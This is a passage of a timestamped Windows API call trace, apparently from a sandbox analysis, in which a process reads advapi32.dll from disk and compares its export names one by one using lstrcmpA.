lpString2="AppCacheGetManifestUrl") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0221.584] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0221.601] GetProcessHeap () returned 0x550000 [0221.602] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x4121040 | out: hHeap=0x550000) returned 1 [0222.011] GetProcessHeap () returned 0x550000 [0222.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x5692b0 [0222.011] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0222.012] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0222.012] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0222.012] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0222.012] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0222.012] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0222.013] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0222.013] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0222.013] GetProcessHeap () returned 0x550000 [0222.013] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa3ef0) returned 0x2d62010 [0222.015] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0222.015] ReadFile (in: hFile=0x140, lpBuffer=0x2d62010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d62010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0222.025] CloseHandle (hObject=0x140) returned 1 [0222.025] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0222.026] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0222.026] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0222.026] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0222.027] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0222.028] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.029] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.030] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0222.030] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.031] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0222.032] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0222.033] lstrcmpA 